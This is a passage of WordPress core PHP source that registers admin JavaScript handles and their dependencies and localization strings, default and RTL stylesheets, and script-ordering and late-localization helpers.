$scripts->add( 'application-passwords', "/wp-admin/js/application-passwords$suffix.js", array( 'jquery', 'wp-util', 'wp-api-request', 'wp-date', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'application-passwords' );
$scripts->add( 'auth-app', "/wp-admin/js/auth-app$suffix.js", array( 'jquery', 'wp-api-request', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'auth-app' );
$scripts->add( 'user-profile', "/wp-admin/js/user-profile$suffix.js", array( 'clipboard', 'jquery', 'password-strength-meter', 'wp-util', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'user-profile' );
$user_id = isset( $_GET['user_id'] ) ? (int) $_GET['user_id'] : 0;
did_action( 'init' ) && $scripts->localize(
'user-profile',
'userProfileL10n',
array(
'user_id' => $user_id,
'nonce' => wp_installing() ? '' : wp_create_nonce( 'reset-password-for-' . $user_id ),
)
);
$scripts->add( 'language-chooser', "/wp-admin/js/language-chooser$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'user-suggest', "/wp-admin/js/user-suggest$suffix.js", array( 'jquery-ui-autocomplete' ), false, 1 );
$scripts->add( 'admin-bar', "/wp-includes/js/admin-bar$suffix.js", array( 'hoverintent-js' ), false, 1 );
$scripts->add( 'wplink', "/wp-includes/js/wplink$suffix.js", array( 'common', 'jquery', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'wplink' );
did_action( 'init' ) && $scripts->localize(
'wplink',
'wpLinkL10n',
array(
'title' => __( 'Insert/edit link' ),
'update' => __( 'Update' ),
'save' => __( 'Add Link' ),
'noTitle' => __( '(no title)' ),
'noMatchesFound' => __( 'No results found.' ),
'linkSelected' => __( 'Link selected.' ),
'linkInserted' => __( 'Link inserted.' ),
/* translators: Minimum input length in characters to start searching posts in the "Insert/edit link" modal. */
'minInputLength' => (int) _x( '3', 'minimum input length for searching post links' ),
)
);
$scripts->add( 'wpdialogs', "/wp-includes/js/wpdialog$suffix.js", array( 'jquery-ui-dialog' ), false, 1 );
$scripts->add( 'word-count', "/wp-admin/js/word-count$suffix.js", array(), false, 1 );
$scripts->add( 'media-upload', "/wp-admin/js/media-upload$suffix.js", array( 'thickbox', 'shortcode' ), false, 1 );
$scripts->add( 'hoverIntent', "/wp-includes/js/hoverIntent$suffix.js", array( 'jquery' ), '1.10.2', 1 );
// JS-only version of hoverintent (no dependencies).
$scripts->add( 'hoverintent-js', '/wp-includes/js/hoverintent-js.min.js', array(), '2.2.1', 1 );
$scripts->add( 'customize-base', "/wp-includes/js/customize-base$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'customize-loader', "/wp-includes/js/customize-loader$suffix.js", array( 'customize-base' ), false, 1 );
$scripts->add( 'customize-preview', "/wp-includes/js/customize-preview$suffix.js", array( 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'customize-models', '/wp-includes/js/customize-models.js', array( 'underscore', 'backbone' ), false, 1 );
$scripts->add( 'customize-views', '/wp-includes/js/customize-views.js', array( 'jquery', 'underscore', 'imgareaselect', 'customize-models', 'media-editor', 'media-views' ), false, 1 );
$scripts->add( 'customize-controls', "/wp-admin/js/customize-controls$suffix.js", array( 'customize-base', 'wp-a11y', 'wp-util', 'jquery-ui-core' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'customize-controls',
'_wpCustomizeControlsL10n',
array(
'activate' => __( 'Activate & Publish' ),
'save' => __( 'Save & Publish' ), // @todo Remove as not required.
'publish' => __( 'Publish' ),
'published' => __( 'Published' ),
'saveDraft' => __( 'Save Draft' ),
'draftSaved' => __( 'Draft Saved' ),
'updating' => __( 'Updating' ),
'schedule' => _x( 'Schedule', 'customizer changeset action/button label' ),
'scheduled' => _x( 'Scheduled', 'customizer changeset status' ),
'invalid' => __( 'Invalid' ),
'saveBeforeShare' => __( 'Please save your changes in order to share the preview.' ),
'futureDateError' => __( 'You must supply a future date to schedule.' ),
'saveAlert' => __( 'The changes you made will be lost if you navigate away from this page.' ),
'saved' => __( 'Saved' ),
'cancel' => __( 'Cancel' ),
'close' => __( 'Close' ),
'action' => __( 'Action' ),
'discardChanges' => __( 'Discard changes' ),
'cheatin' => __( 'An error occurred. Please try again later.' ),
'notAllowedHeading' => __( 'You need a higher level of permission.' ),
'notAllowed' => __( 'Sorry, you are not allowed to customize this site.' ),
'previewIframeTitle' => __( 'Site Preview' ),
'loginIframeTitle' => __( 'Session expired' ),
'collapseSidebar' => _x( 'Hide Controls', 'label for hide controls button without length constraints' ),
'expandSidebar' => _x( 'Show Controls', 'label for hide controls button without length constraints' ),
'untitledBlogName' => __( '(Untitled)' ),
'unknownRequestFail' => __( 'Looks like something’s gone wrong. Wait a couple seconds, and then try again.' ),
'themeDownloading' => __( 'Downloading your new theme…' ),
'themePreviewWait' => __( 'Setting up your live preview. This may take a bit.' ),
'revertingChanges' => __( 'Reverting unpublished changes…' ),
'trashConfirm' => __( 'Are you sure you want to discard your unpublished changes?' ),
/* translators: %s: Display name of the user who has taken over the changeset in customizer. */
'takenOverMessage' => __( '%s has taken over and is currently customizing.' ),
/* translators: %s: URL to the Customizer to load the autosaved version. */
'autosaveNotice' => __( 'There is a more recent autosave of your changes than the one you are previewing. <a href="%s">Restore the autosave</a>' ),
'videoHeaderNotice' => __( 'This theme does not support video headers on this page. Navigate to the front page or another page that supports video headers.' ),
// Used for overriding the file types allowed in Plupload.
'allowedFiles' => __( 'Allowed Files' ),
'customCssError' => array(
/* translators: %d: Error count. */
'singular' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 1 ),
/* translators: %d: Error count. */
'plural' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'pageOnFrontError' => __( 'Homepage and posts page must be different.' ),
'saveBlockedError' => array(
/* translators: %s: Number of invalid settings. */
'singular' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 1 ),
/* translators: %s: Number of invalid settings. */
'plural' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'scheduleDescription' => __( 'Schedule your customization changes to publish ("go live") at a future date.' ),
'themePreviewUnavailable' => __( 'Sorry, you cannot preview new themes when you have changes scheduled or saved as a draft. Please publish your changes, or wait until they publish to preview new themes.' ),
'themeInstallUnavailable' => sprintf(
/* translators: %s: URL to Add Themes admin screen. */
__( 'You will not be able to install new themes from here yet since your install requires SFTP credentials. For now, please <a href="%s">add themes in the admin</a>.' ),
esc_url( admin_url( 'theme-install.php' ) )
),
'publishSettings' => __( 'Publish Settings' ),
'invalidDate' => __( 'Invalid date.' ),
'invalidValue' => __( 'Invalid value.' ),
'blockThemeNotification' => sprintf(
/* translators: 1: Link to Site Editor documentation on HelpHub, 2: HTML button. */
__( 'Hurray! Your theme supports site editing with blocks. <a href="%1$s">Tell me more</a>. %2$s' ),
__( 'https://wordpress.org/documentation/article/site-editor/' ),
sprintf(
'<button type="button" data-action="%1$s" class="button switch-to-editor">%2$s</button>',
esc_url( admin_url( 'site-editor.php' ) ),
__( 'Use Site Editor' )
)
),
)
);
$scripts->add( 'customize-selective-refresh', "/wp-includes/js/customize-selective-refresh$suffix.js", array( 'jquery', 'wp-util', 'customize-preview' ), false, 1 );
$scripts->add( 'customize-widgets', "/wp-admin/js/customize-widgets$suffix.js", array( 'jquery', 'jquery-ui-sortable', 'jquery-ui-droppable', 'wp-backbone', 'customize-controls' ), false, 1 );
$scripts->add( 'customize-preview-widgets', "/wp-includes/js/customize-preview-widgets$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'customize-nav-menus', "/wp-admin/js/customize-nav-menus$suffix.js", array( 'jquery', 'wp-backbone', 'customize-controls', 'accordion', 'nav-menu', 'wp-sanitize' ), false, 1 );
$scripts->add( 'customize-preview-nav-menus', "/wp-includes/js/customize-preview-nav-menus$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'wp-custom-header', "/wp-includes/js/wp-custom-header$suffix.js", array( 'wp-a11y' ), false, 1 );
$scripts->add( 'accordion', "/wp-admin/js/accordion$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'shortcode', "/wp-includes/js/shortcode$suffix.js", array( 'underscore' ), false, 1 );
$scripts->add( 'media-models', "/wp-includes/js/media-models$suffix.js", array( 'wp-backbone' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'media-models',
'_wpMediaModelsL10n',
array(
'settings' => array(
'ajaxurl' => admin_url( 'admin-ajax.php', 'relative' ),
'post' => array( 'id' => 0 ),
),
)
);
$scripts->add( 'wp-embed', "/wp-includes/js/wp-embed$suffix.js" );
did_action( 'init' ) && $scripts->add_data( 'wp-embed', 'strategy', 'defer' );
/*
* To enqueue media-views or media-editor, call wp_enqueue_media().
* Both rely on numerous settings, styles, and templates to operate correctly.
*/
$scripts->add( 'media-views', "/wp-includes/js/media-views$suffix.js", array( 'utils', 'media-models', 'wp-plupload', 'jquery-ui-sortable', 'wp-mediaelement', 'wp-api-request', 'wp-a11y', 'clipboard' ), false, 1 );
$scripts->set_translations( 'media-views' );
$scripts->add( 'media-editor', "/wp-includes/js/media-editor$suffix.js", array( 'shortcode', 'media-views' ), false, 1 );
$scripts->set_translations( 'media-editor' );
$scripts->add( 'media-audiovideo', "/wp-includes/js/media-audiovideo$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'mce-view', "/wp-includes/js/mce-view$suffix.js", array( 'shortcode', 'jquery', 'media-views', 'media-audiovideo' ), false, 1 );
$scripts->add( 'wp-api', "/wp-includes/js/wp-api$suffix.js", array( 'jquery', 'backbone', 'underscore', 'wp-api-request' ), false, 1 );
if ( is_admin() ) {
$scripts->add( 'admin-tags', "/wp-admin/js/tags$suffix.js", array( 'jquery', 'wp-ajax-response' ), false, 1 );
$scripts->set_translations( 'admin-tags' );
$scripts->add( 'admin-comments', "/wp-admin/js/edit-comments$suffix.js", array( 'wp-lists', 'quicktags', 'jquery-query', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-comments' );
did_action( 'init' ) && $scripts->localize(
'admin-comments',
'adminCommentsSettings',
array(
'hotkeys_highlight_first' => isset( $_GET['hotkeys_highlight_first'] ),
'hotkeys_highlight_last' => isset( $_GET['hotkeys_highlight_last'] ),
)
);
$scripts->add( 'xfn', "/wp-admin/js/xfn$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'postbox', "/wp-admin/js/postbox$suffix.js", array( 'jquery-ui-sortable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'postbox' );
$scripts->add( 'tags-box', "/wp-admin/js/tags-box$suffix.js", array( 'jquery', 'tags-suggest' ), false, 1 );
$scripts->set_translations( 'tags-box' );
$scripts->add( 'tags-suggest', "/wp-admin/js/tags-suggest$suffix.js", array( 'common', 'jquery-ui-autocomplete', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'tags-suggest' );
$scripts->add( 'post', "/wp-admin/js/post$suffix.js", array( 'suggest', 'wp-lists', 'postbox', 'tags-box', 'underscore', 'word-count', 'wp-a11y', 'wp-sanitize', 'clipboard' ), false, 1 );
$scripts->set_translations( 'post' );
$scripts->add( 'editor-expand', "/wp-admin/js/editor-expand$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'link', "/wp-admin/js/link$suffix.js", array( 'wp-lists', 'postbox' ), false, 1 );
$scripts->add( 'comment', "/wp-admin/js/comment$suffix.js", array( 'jquery', 'postbox' ), false, 1 );
$scripts->set_translations( 'comment' );
$scripts->add( 'admin-gallery', "/wp-admin/js/gallery$suffix.js", array( 'jquery-ui-sortable' ) );
$scripts->add( 'admin-widgets', "/wp-admin/js/widgets$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-widgets' );
$scripts->add( 'media-widgets', "/wp-admin/js/widgets/media-widgets$suffix.js", array( 'jquery', 'media-models', 'media-views', 'wp-api-request' ) );
$scripts->add_inline_script( 'media-widgets', 'wp.mediaWidgets.init();', 'after' );
$scripts->add( 'media-audio-widget', "/wp-admin/js/widgets/media-audio-widget$suffix.js", array( 'media-widgets', 'media-audiovideo' ) );
$scripts->add( 'media-image-widget', "/wp-admin/js/widgets/media-image-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-gallery-widget', "/wp-admin/js/widgets/media-gallery-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-video-widget', "/wp-admin/js/widgets/media-video-widget$suffix.js", array( 'media-widgets', 'media-audiovideo', 'wp-api-request' ) );
$scripts->add( 'text-widgets', "/wp-admin/js/widgets/text-widgets$suffix.js", array( 'jquery', 'backbone', 'editor', 'wp-util', 'wp-a11y' ) );
$scripts->add( 'custom-html-widgets', "/wp-admin/js/widgets/custom-html-widgets$suffix.js", array( 'jquery', 'backbone', 'wp-util', 'jquery-ui-core', 'wp-a11y' ) );
$scripts->add( 'theme', "/wp-admin/js/theme$suffix.js", array( 'wp-backbone', 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'inline-edit-post', "/wp-admin/js/inline-edit-post$suffix.js", array( 'jquery', 'tags-suggest', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-post' );
$scripts->add( 'inline-edit-tax', "/wp-admin/js/inline-edit-tax$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-tax' );
$scripts->add( 'plugin-install', "/wp-admin/js/plugin-install$suffix.js", array( 'jquery', 'jquery-ui-core', 'thickbox' ), false, 1 );
$scripts->set_translations( 'plugin-install' );
$scripts->add( 'site-health', "/wp-admin/js/site-health$suffix.js", array( 'clipboard', 'jquery', 'wp-util', 'wp-a11y', 'wp-api-request', 'wp-url', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'site-health' );
$scripts->add( 'privacy-tools', "/wp-admin/js/privacy-tools$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'privacy-tools' );
$scripts->add( 'updates', "/wp-admin/js/updates$suffix.js", array( 'common', 'jquery', 'wp-util', 'wp-a11y', 'wp-sanitize', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'updates' );
did_action( 'init' ) && $scripts->localize(
'updates',
'_wpUpdatesSettings',
array(
'ajax_nonce' => wp_installing() ? '' : wp_create_nonce( 'updates' ),
)
);
$scripts->add( 'farbtastic', '/wp-admin/js/farbtastic.js', array( 'jquery' ), '1.2' );
$scripts->add( 'iris', '/wp-admin/js/iris.min.js', array( 'jquery-ui-draggable', 'jquery-ui-slider', 'jquery-touch-punch' ), '1.1.1', 1 );
$scripts->add( 'wp-color-picker', "/wp-admin/js/color-picker$suffix.js", array( 'iris' ), false, 1 );
$scripts->set_translations( 'wp-color-picker' );
$scripts->add( 'dashboard', "/wp-admin/js/dashboard$suffix.js", array( 'common', 'jquery', 'admin-comments', 'postbox', 'wp-util', 'wp-a11y', 'wp-date' ), false, 1 );
$scripts->set_translations( 'dashboard' );
$scripts->add( 'list-revisions', "/wp-includes/js/wp-list-revisions$suffix.js" );
$scripts->add( 'media-grid', "/wp-includes/js/media-grid$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'media', "/wp-admin/js/media$suffix.js", array( 'jquery', 'clipboard', 'wp-i18n', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'media' );
$scripts->add( 'image-edit', "/wp-admin/js/image-edit$suffix.js", array( 'jquery', 'jquery-ui-core', 'imgareaselect', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'image-edit' );
$scripts->add( 'set-post-thumbnail', "/wp-admin/js/set-post-thumbnail$suffix.js", array( 'jquery' ), false, 1 );
$scripts->set_translations( 'set-post-thumbnail' );
/*
* Navigation Menus: Adding underscore as a dependency to utilize _.debounce
* see https://core.trac.wordpress.org/ticket/42321
*/
$scripts->add( 'nav-menu', "/wp-admin/js/nav-menu$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-lists', 'postbox', 'underscore' ) );
$scripts->set_translations( 'nav-menu' );
$scripts->add( 'custom-header', '/wp-admin/js/custom-header.js', array( 'jquery-masonry' ), false, 1 );
$scripts->add( 'custom-background', "/wp-admin/js/custom-background$suffix.js", array( 'wp-color-picker', 'media-views' ), false, 1 );
$scripts->add( 'media-gallery', "/wp-admin/js/media-gallery$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'svg-painter', '/wp-admin/js/svg-painter.js', array( 'jquery' ), false, 1 );
}
}
/**
* Assigns default styles to $styles object.
*
* Nothing is returned, because the $styles parameter is passed by reference.
* Meaning that whatever object is passed will be updated without having to
* reassign the variable that was passed back to the same value. This saves
* memory.
*
* Adding default styles is not the only task, it also assigns the base_url
* property, the default version, and text direction for the object.
*
* @since 2.6.0
*
* @global array $editor_styles
*
* @param WP_Styles $styles
*/
function wp_default_styles( $styles ) {
global $editor_styles;
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
define( 'SCRIPT_DEBUG', false !== strpos( $wp_version, '-src' ) );
}
$guessurl = site_url();
if ( ! $guessurl ) {
$guessurl = wp_guess_url();
}
$styles->base_url = $guessurl;
$styles->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$styles->default_version = get_bloginfo( 'version' );
$styles->text_direction = function_exists( 'is_rtl' ) && is_rtl() ? 'rtl' : 'ltr';
$styles->default_dirs = array( '/wp-admin/', '/wp-includes/css/' );
// Open Sans is no longer used by core, but may be relied upon by themes and plugins.
$open_sans_font_url = '';
/*
* translators: If there are characters in your language that are not supported
* by Open Sans, translate this to 'off'. Do not translate into your own language.
*/
if ( 'off' !== _x( 'on', 'Open Sans font: on or off' ) ) {
$subsets = 'latin,latin-ext';
/*
* translators: To add an additional Open Sans character subset specific to your language,
* translate this to 'greek', 'cyrillic' or 'vietnamese'. Do not translate into your own language.
*/
$subset = _x( 'no-subset', 'Open Sans font: add new subset (greek, cyrillic, vietnamese)' );
if ( 'cyrillic' === $subset ) {
$subsets .= ',cyrillic,cyrillic-ext';
} elseif ( 'greek' === $subset ) {
$subsets .= ',greek,greek-ext';
} elseif ( 'vietnamese' === $subset ) {
$subsets .= ',vietnamese';
}
// Hotlink Open Sans, for now.
$open_sans_font_url = "https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,300,400,600&subset=$subsets&display=fallback";
}
// Register a stylesheet for the selected admin color scheme.
$styles->add( 'colors', true, array( 'wp-admin', 'buttons' ) );
$suffix = SCRIPT_DEBUG ? '' : '.min';
// Admin CSS.
$styles->add( 'common', "/wp-admin/css/common$suffix.css" );
$styles->add( 'forms', "/wp-admin/css/forms$suffix.css" );
$styles->add( 'admin-menu', "/wp-admin/css/admin-menu$suffix.css" );
$styles->add( 'dashboard', "/wp-admin/css/dashboard$suffix.css" );
$styles->add( 'list-tables', "/wp-admin/css/list-tables$suffix.css" );
$styles->add( 'edit', "/wp-admin/css/edit$suffix.css" );
$styles->add( 'revisions', "/wp-admin/css/revisions$suffix.css" );
$styles->add( 'media', "/wp-admin/css/media$suffix.css" );
$styles->add( 'themes', "/wp-admin/css/themes$suffix.css" );
$styles->add( 'about', "/wp-admin/css/about$suffix.css" );
$styles->add( 'nav-menus', "/wp-admin/css/nav-menus$suffix.css" );
$styles->add( 'widgets', "/wp-admin/css/widgets$suffix.css", array( 'wp-pointer' ) );
$styles->add( 'site-icon', "/wp-admin/css/site-icon$suffix.css" );
$styles->add( 'l10n', "/wp-admin/css/l10n$suffix.css" );
$styles->add( 'code-editor', "/wp-admin/css/code-editor$suffix.css", array( 'wp-codemirror' ) );
$styles->add( 'site-health', "/wp-admin/css/site-health$suffix.css" );
$styles->add( 'wp-admin', false, array( 'dashicons', 'common', 'forms', 'admin-menu', 'dashboard', 'list-tables', 'edit', 'revisions', 'media', 'themes', 'about', 'nav-menus', 'widgets', 'site-icon', 'l10n' ) );
$styles->add( 'login', "/wp-admin/css/login$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'install', "/wp-admin/css/install$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'wp-color-picker', "/wp-admin/css/color-picker$suffix.css" );
$styles->add( 'customize-controls', "/wp-admin/css/customize-controls$suffix.css", array( 'wp-admin', 'colors', 'imgareaselect' ) );
$styles->add( 'customize-widgets', "/wp-admin/css/customize-widgets$suffix.css", array( 'wp-admin', 'colors' ) );
$styles->add( 'customize-nav-menus', "/wp-admin/css/customize-nav-menus$suffix.css", array( 'wp-admin', 'colors' ) );
// Common dependencies.
$styles->add( 'buttons', "/wp-includes/css/buttons$suffix.css" );
$styles->add( 'dashicons', "/wp-includes/css/dashicons$suffix.css" );
// Includes CSS.
$styles->add( 'admin-bar', "/wp-includes/css/admin-bar$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-auth-check', "/wp-includes/css/wp-auth-check$suffix.css", array( 'dashicons' ) );
$styles->add( 'editor-buttons', "/wp-includes/css/editor$suffix.css", array( 'dashicons' ) );
$styles->add( 'media-views', "/wp-includes/css/media-views$suffix.css", array( 'buttons', 'dashicons', 'wp-mediaelement' ) );
$styles->add( 'wp-pointer', "/wp-includes/css/wp-pointer$suffix.css", array( 'dashicons' ) );
$styles->add( 'customize-preview', "/wp-includes/css/customize-preview$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-empty-template-alert', "/wp-includes/css/wp-empty-template-alert$suffix.css" );
// External libraries and friends.
$styles->add( 'imgareaselect', '/wp-includes/js/imgareaselect/imgareaselect.css', array(), '0.9.8' );
$styles->add( 'wp-jquery-ui-dialog', "/wp-includes/css/jquery-ui-dialog$suffix.css", array( 'dashicons' ) );
$styles->add( 'mediaelement', '/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css', array(), '4.2.17' );
$styles->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.css", array( 'mediaelement' ) );
$styles->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.css', array( 'dashicons' ) );
$styles->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.css', array(), '5.29.1-alpha-ee20357' );
// Deprecated CSS.
$styles->add( 'deprecated-media', "/wp-admin/css/deprecated-media$suffix.css" );
$styles->add( 'farbtastic', "/wp-admin/css/farbtastic$suffix.css", array(), '1.3u1' );
$styles->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.css', array(), '0.9.15' );
$styles->add( 'colors-fresh', false, array( 'wp-admin', 'buttons' ) ); // Old handle.
$styles->add( 'open-sans', $open_sans_font_url ); // No longer used in core as of 4.6.
$styles->add( 'wp-embed-template-ie', false );
$styles->add_data( 'wp-embed-template-ie', 'conditional', '_required-conditional-dependency_' );
// Noto Serif is no longer used by core, but may be relied upon by themes and plugins.
$fonts_url = '';
/*
* translators: Use this to specify the proper Google Font name and variants
* to load that is supported by your language. Do not translate.
* Set to 'off' to disable loading.
*/
$font_family = _x( 'Noto Serif:400,400i,700,700i', 'Google Font Name and Variants' );
if ( 'off' !== $font_family ) {
$fonts_url = 'https://fonts.googleapis.com/css?family=' . urlencode( $font_family );
}
$styles->add( 'wp-editor-font', $fonts_url ); // No longer used in core as of 5.7.
$block_library_theme_path = WPINC . "/css/dist/block-library/theme$suffix.css";
$styles->add( 'wp-block-library-theme', "/$block_library_theme_path" );
$styles->add_data( 'wp-block-library-theme', 'path', ABSPATH . $block_library_theme_path );
$classic_theme_styles_path = WPINC . "/css/classic-themes$suffix.css";
$styles->add( 'classic-theme-styles', "/$classic_theme_styles_path" );
$styles->add_data( 'classic-theme-styles', 'path', ABSPATH . $classic_theme_styles_path );
$styles->add(
'wp-reset-editor-styles',
"/wp-includes/css/dist/block-library/reset$suffix.css",
array( 'common', 'forms' ) // Make sure the reset is loaded after the default WP Admin styles.
);
$styles->add(
'wp-editor-classic-layout-styles',
"/wp-includes/css/dist/edit-post/classic$suffix.css",
array()
);
$styles->add(
'wp-block-editor-content',
"/wp-includes/css/dist/block-editor/content$suffix.css",
array( 'wp-components' )
);
// Only add CONTENT styles here that should be enqueued in the iframe!
$wp_edit_blocks_dependencies = array(
'wp-components',
/*
* This needs to be added before the block library styles,
* The block library styles override the "reset" styles.
*/
'wp-reset-editor-styles',
'wp-block-library',
'wp-block-editor-content',
);
// Only load the default layout and margin styles for themes without theme.json file.
if ( ! wp_theme_has_theme_json() ) {
$wp_edit_blocks_dependencies[] = 'wp-editor-classic-layout-styles';
}
if (
current_theme_supports( 'wp-block-styles' ) &&
( ! is_array( $editor_styles ) || count( $editor_styles ) === 0 )
) {
/*
* Include opinionated block styles if the theme supports block styles and
* no $editor_styles are declared, so the editor never appears broken.
*/
$wp_edit_blocks_dependencies[] = 'wp-block-library-theme';
}
$styles->add(
'wp-edit-blocks',
"/wp-includes/css/dist/block-library/editor$suffix.css",
$wp_edit_blocks_dependencies
);
$package_styles = array(
'block-editor' => array( 'wp-components', 'wp-preferences' ),
'block-library' => array(),
'block-directory' => array(),
'components' => array(),
'commands' => array( 'wp-components' ),
'edit-post' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-commands',
'wp-preferences',
),
'editor' => array(
'wp-components',
'wp-block-editor',
'wp-reusable-blocks',
'wp-patterns',
'wp-preferences',
),
'format-library' => array(),
'list-reusable-blocks' => array( 'wp-components' ),
'reusable-blocks' => array( 'wp-components' ),
'patterns' => array( 'wp-components' ),
'preferences' => array( 'wp-components' ),
'nux' => array( 'wp-components' ),
'widgets' => array(
'wp-components',
),
'edit-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'customize-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'edit-site' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-commands',
'wp-preferences',
),
);
foreach ( $package_styles as $package => $dependencies ) {
$handle = 'wp-' . $package;
$path = "/wp-includes/css/dist/$package/style$suffix.css";
if ( 'block-library' === $package && wp_should_load_separate_core_block_assets() ) {
$path = "/wp-includes/css/dist/$package/common$suffix.css";
}
$styles->add( $handle, $path, $dependencies );
$styles->add_data( $handle, 'path', ABSPATH . $path );
}
// RTL CSS.
$rtl_styles = array(
// Admin CSS.
'common',
'forms',
'admin-menu',
'dashboard',
'list-tables',
'edit',
'revisions',
'media',
'themes',
'about',
'nav-menus',
'widgets',
'site-icon',
'l10n',
'install',
'wp-color-picker',
'customize-controls',
'customize-widgets',
'customize-nav-menus',
'customize-preview',
'login',
'site-health',
'wp-empty-template-alert',
// Includes CSS.
'buttons',
'admin-bar',
'wp-auth-check',
'editor-buttons',
'media-views',
'wp-pointer',
'wp-jquery-ui-dialog',
// Package styles.
'wp-reset-editor-styles',
'wp-editor-classic-layout-styles',
'wp-block-library-theme',
'wp-edit-blocks',
'wp-block-editor',
'wp-block-library',
'wp-block-directory',
'wp-commands',
'wp-components',
'wp-customize-widgets',
'wp-edit-post',
'wp-edit-site',
'wp-edit-widgets',
'wp-editor',
'wp-format-library',
'wp-list-reusable-blocks',
'wp-reusable-blocks',
'wp-patterns',
'wp-nux',
'wp-widgets',
// Deprecated CSS.
'deprecated-media',
'farbtastic',
);
foreach ( $rtl_styles as $rtl_style ) {
$styles->add_data( $rtl_style, 'rtl', 'replace' );
if ( $suffix ) {
$styles->add_data( $rtl_style, 'suffix', $suffix );
}
}
}
/**
* Reorders JavaScript scripts array to place prototype before jQuery.
*
* @since 2.3.1
*
* @param string[] $js_array JavaScript scripts array
* @return string[] Reordered array, if needed.
*/
function wp_prototype_before_jquery( $js_array ) {
$prototype = array_search( 'prototype', $js_array, true );
if ( false === $prototype ) {
return $js_array;
}
$jquery = array_search( 'jquery', $js_array, true );
if ( false === $jquery ) {
return $js_array;
}
if ( $prototype < $jquery ) {
return $js_array;
}
unset( $js_array[ $prototype ] );
array_splice( $js_array, $jquery, 0, 'prototype' );
return $js_array;
}
/**
* Loads localized data on print rather than initialization.
*
* These localizations require information that may not be loaded even by init.
*
* @since 2.5.0
*
* @global array $shortcode_tags
*/
function wp_just_in_time_script_localization() {
wp_localize_script(
'autosave',
'autosaveL10n',
array(
'autosaveInterval' => AUTOSAVE_INTERVAL,
'blog_id' => get_current_blog_id(),
)
);
wp_localize_script(
'mce-view',
'mceViewL10n',
array(
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
wp_localize_script(
'word-count',
'wordCountL10n',
array(
'type' => wp_get_word_count_type(),
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
}
/**
* Localizes the jQuery UI datepicker.
*
